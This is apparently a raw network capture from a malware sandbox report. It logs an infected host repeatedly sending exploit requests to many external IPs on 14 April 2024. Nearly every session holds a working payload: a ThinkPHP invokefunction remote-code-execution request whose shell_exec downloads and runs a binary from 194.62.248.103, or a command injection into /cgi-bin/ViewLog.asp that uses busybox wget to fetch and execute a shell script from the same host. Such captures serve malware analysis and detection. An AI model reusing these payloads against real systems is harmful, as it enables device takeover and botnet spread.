                                                        Apr 14, 2024 16:37:35.599960089 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:37.967730045 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:42.575051069 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:51.533941984 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:38:09.451392889 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1047192.168.2.235992031.44.130.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.934549093 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1048192.168.2.235428894.122.79.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:34.315012932 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1049192.168.2.235613694.122.115.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:34.315181017 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1050192.168.2.233945262.148.154.1368080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:34.342081070 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1051192.168.2.2357402112.197.114.280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:35.643867016 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:36.311897993 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:36.867494106 CEST339INHTTP/1.0 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 21:37:36 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1052192.168.2.233916094.140.0.838080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:38.884578943 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1053192.168.2.234101662.104.102.268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.035984039 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:39.345377922 CEST233INHTTP/1.1 400 Bad Request
                                                        Content-type: text/html
                                                        Date: Sun, 14 Apr 2024 16:37:39 GMT
                                                        Last-modified: Sun, 14 Apr 2024 16:37:39 GMT
                                                        Server: GIANTS Dedicated Server GIANTS Dedicated Server/9.2.0.0
                                                        Content-Length: 58


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1054192.168.2.234833031.136.142.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.048379898 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:40.047352076 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:41.999227047 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:45.902607918 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:53.837639093 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:09.451534033 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1055192.168.2.235454862.202.2.1908080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.050436974 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:39.362049103 CEST513INHTTP/1.1 503 Service Unavailable
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:37:38 GMT
                                                        Connection: close
                                                        Content-Length: 326
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
                                                        Apr 14, 2024 16:37:40.021976948 CEST513INHTTP/1.1 503 Service Unavailable
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:37:38 GMT
                                                        Connection: close
                                                        Content-Length: 326
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1056192.168.2.235187631.136.126.1318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.053828001 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:42.063195944 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:48.206317902 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:00.236845970 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:25.833254099 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1057192.168.2.234416085.67.132.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.062772989 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:39.390829086 CEST274INHTTP/1.0 200 OK
                                                        Server: httpd/2.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        Date: Sun, 14 Apr 2024 14:37:39 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1058192.168.2.235525094.123.134.1888080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.066756010 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1059192.168.2.234768495.241.185.588080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.071525097 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
